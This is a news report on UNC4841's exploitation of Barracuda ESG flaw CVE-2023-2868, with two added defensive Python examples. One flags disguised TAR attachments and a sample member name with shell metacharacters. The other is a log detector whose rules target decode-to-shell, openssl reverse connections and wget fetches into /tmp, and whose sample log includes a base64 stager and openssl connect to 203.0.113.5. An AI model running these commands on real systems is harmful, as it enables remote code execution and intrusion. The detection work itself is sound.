Suspected Chinese hackers implicated in Barracuda ESG zero-day attack incidents

A hacker group known as UNC4841, believed to have affiliations with China, has been identified as the culprit behind a series of data theft attacks on Barracuda ESG (Email Security Gateway) appliances. The attacks exploited a zero-day vulnerability, CVE-2023-2868, in Barracuda’s email attachment scanning module, which has since been patched.

The exploitation of the zero-day vulnerability began around October 10, 2022, with the threat actors deploying previously unknown malware onto vulnerable Barracuda ESG devices and extracting sensitive data. The flaw was discovered by the vendor on May 19, 2023, prompting immediate disclosure and the release of security updates.

Barracuda took the extraordinary step of replacing affected devices free of charge rather than relying on reimaging with new firmware. This decision was driven by the suspicion that the threat actors had compromised the devices at a deep level, making it difficult to guarantee complete removal of the malware.

According to Mandiant, the incident response division of cybersecurity company FireEye, the hacking group UNC4841 is known for conducting cyber espionage activities in support of the Chinese government. The attacks initiated by UNC4841 involved sending malicious emails with disguised “.tar” file attachments (posing as “.jpg” or “.dat” files) to exploit vulnerabilities in Barracuda ESG devices. When the Barracuda Email Security Gateway attempted to scan these attachments, the exploit took advantage of the CVE-2023-2868 flaw to execute remote commands on the devices.
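The delivery step above hinges on an attachment whose extension says one thing (".jpg", ".dat") while its bytes say another (a TAR archive). The following is an added example, not code from Barracuda, Mandiant or the article, showing how a mail-gateway pre-filter can refuse to trust the extension: it sniffs the real type from magic bytes, and, for anything that is actually a TAR, lists the member names and flags any containing shell metacharacters, since member names are a classic injection vector for archive scanners that shell out. The sample archive and member names are constructed here for the demonstration; the metacharacter set and the `Verdict` structure are this example's own choices.

```python
import io
import re
import tarfile
from dataclasses import dataclass, field

# Magic bytes: JPEG starts with FF D8 FF; a POSIX tar header carries
# "ustar" at byte offset 257 of its first 512-byte block.
JPEG_MAGIC = b"\xff\xd8\xff"
TAR_MAGIC_OFFSET = 257
TAR_MAGIC = b"ustar"

# Characters that have no business in an archive member name that a scanner
# might pass to a shell-based helper (assumed policy for this example).
SHELL_META = re.compile(r"[;&|`$(){}<>\n\\'\"]")

EXTENSION_KIND = {"jpg": "jpeg", "jpeg": "jpeg", "tar": "tar"}


@dataclass
class Verdict:
    claimed: str                      # extension the filename claims
    actual: str                       # type sniffed from the bytes
    mismatch: bool                    # archive disguised under another extension
    suspicious_members: list = field(default_factory=list)


def sniff(data: bytes) -> str:
    """Return the content type implied by the magic bytes, not the name."""
    if data.startswith(JPEG_MAGIC):
        return "jpeg"
    end = TAR_MAGIC_OFFSET + len(TAR_MAGIC)
    if len(data) >= end and data[TAR_MAGIC_OFFSET:end] == TAR_MAGIC:
        return "tar"
    return "unknown"


def tar_member_names(data: bytes) -> list:
    """Parse the archive with the standard library and return member names."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tf:
        return [m.name for m in tf.getmembers()]


def inspect_attachment(filename: str, data: bytes) -> Verdict:
    """Compare claimed vs. sniffed type and audit tar member names."""
    claimed = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    actual = sniff(data)
    mismatch = actual == "tar" and EXTENSION_KIND.get(claimed) != "tar"
    suspicious = []
    if actual == "tar":
        try:
            suspicious = [n for n in tar_member_names(data) if SHELL_META.search(n)]
        except tarfile.ReadError:
            # A file that carries the tar magic but will not parse is itself suspect.
            suspicious = ["<unparseable tar>"]
    return Verdict(claimed, actual, mismatch, suspicious)


def build_tar(members: dict) -> bytes:
    """Build a small in-memory tar archive (constructed sample input)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, payload in members.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(payload)
            tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample: a tar archive delivered under a .jpg name, with one
    # member whose name contains shell metacharacters.
    disguised = build_tar({"quarterly_report.txt": b"plain text",
                           "report|2023;final.txt": b"x"})
    print(inspect_attachment("picture.jpg", disguised))
```

In a real gateway the verdict would drive quarantine and alerting; the point of the check is that the content-derived type, not the sender-controlled extension, decides which scanning path the attachment enters, and that archive member names are validated before any further processing.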

Once remote access to the Barracuda ESG devices was established, the threat actors employed malware strains named “Saltwater,” “Seaspy,” and “Seaside” to pilfer email data. UNC4841 specifically targeted certain data for exfiltration and occasionally utilized compromised ESG appliances to navigate the victims’ networks or send malicious emails to other affected devices.

Barracuda’s discovery of the breach and subsequent patch release prompted UNC4841 to modify their malware and adopt diversified persistence techniques to elude detection based on Indicators of Compromise (IoC). Between May 22 and May 24, 2023, the hackers launched an intensified attack campaign targeting vulnerable devices in government agencies and other significant organizations across at least 16 countries.

The attack chain involved the exploitation of CVE-2023-2868 through manipulated TAR file attachments to execute a base64-encoded reverse shell payload on vulnerable Barracuda ESG appliances. This payload established a new session, created an interactive shell, and used OpenSSL to communicate with specified IP addresses and ports. The threat actors then used wget commands to retrieve additional payloads from their command-and-control (C2) servers, primarily “Saltwater,” “Seaspy,” and “Seaside.”
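The chain just described leaves a recognisable trail in any command or process audit log: a base64 blob decoded straight into a shell, an `openssl s_client` session to a bare IP and port, and a `wget` fetch into a world-writable directory. The following is an added example, not from the article or from Barracuda or Mandiant, of a small detector run over such lines. Because the first stage is base64-encoded, the detector also decodes any base64 run it finds and re-applies the same rules to the decoded text, so the staged fetch hidden inside the blob is caught as well. The log format, the rule patterns and the sample lines are all constructed for this example.

```python
import base64
import binascii
import re
import string

# Detection rules (assumed patterns for this example): name -> compiled regex.
RULES = [
    ("decode-to-shell",
     re.compile(r"base64\s+(?:-d|--decode)\b[^|]*\|\s*(?:ba|da)?sh\b")),
    ("openssl-connect",
     re.compile(r"openssl\s+s_client\b.*-connect\s+\d{1,3}(?:\.\d{1,3}){3}:\d+")),
    ("fetch-to-tmp",
     re.compile(r"\b(?:wget|curl)\b.*\s-[oO]\s*(?:/tmp|/var/tmp|/dev/shm)/")),
]

# A run of base64 alphabet characters long enough to be worth decoding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_blobs(line: str) -> list:
    """Return printable ASCII text recovered from base64 runs in the line."""
    out = []
    for m in B64_RUN.finditer(line):
        token = m.group(0)
        if len(token) % 4:            # not a complete base64 quantum; skip
            continue
        try:
            raw = base64.b64decode(token, validate=True)
            text = raw.decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if text and all(c in string.printable for c in text):
            out.append(text)
    return out


def scan(lines: list) -> list:
    """Apply every rule to each raw line and to any base64 payload it carries.

    Returns (line_index, rule_name, "raw" | "decoded") tuples in scan order.
    """
    findings = []
    for idx, line in enumerate(lines):
        for name, rx in RULES:
            if rx.search(line):
                findings.append((idx, name, "raw"))
        for text in decoded_blobs(line):
            for name, rx in RULES:
                if rx.search(text):
                    findings.append((idx, name, "decoded"))
    return findings


# Constructed sample audit lines (not real appliance logs). The base64 blob
# is built here so it decodes to a staged fetch into /tmp.
_STAGED = base64.b64encode(b"wget http://203.0.113.5/update.bin -O /tmp/update.bin").decode()
SAMPLE_LOG = [
    "Jun 15 10:22:01 esg01 audit: uid=0 cmd=ls -la /home",
    f"Jun 15 10:22:09 esg01 audit: uid=0 cmd=sh -c 'echo {_STAGED} | base64 -d | sh'",
    "Jun 15 10:22:15 esg01 audit: uid=0 cmd=openssl s_client -quiet -connect 203.0.113.5:443",
    "Jun 15 10:22:30 esg01 audit: uid=0 cmd=openssl x509 -in /etc/ssl/server.pem -noout -dates",
    "Jun 15 10:23:02 esg01 audit: uid=0 cmd=wget https://updates.example.com/defs.tgz -O /var/lib/app/defs.tgz",
]

if __name__ == "__main__":
    for idx, rule, source in scan(SAMPLE_LOG):
        print(f"line {idx}: {rule} ({source}): {SAMPLE_LOG[idx]}")
```

The benign `openssl x509` and the vendor-style `wget` into `/var/lib` are deliberately included so the rules have to discriminate on the connect target and the destination directory rather than on the tool name alone; in production these signatures would be one layer beside the IoC lists, since the article notes the actor reworked its tooling once those were published.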

UNC4841’s persistence mechanisms included Seaspy, a passive tool that acted as a PCAP filter, as well as Sandbar, which concealed Seaspy’s activity by hiding Linux server processes. The hackers moved laterally quickly and conducted targeted searches for specific email messages within compromised appliances, focusing on organizations such as ASEAN ministries of foreign affairs (MFAs), foreign trade offices, and academic research institutions in Taiwan and Hong Kong.

Given the likelihood of UNC4841 diversifying their tactics to avoid detection, organizations are advised to remain highly vigilant. It is recommended to replace compromised Barracuda ESG appliances, regardless of their patch level, and conduct thorough investigations using the provided indicators of compromise.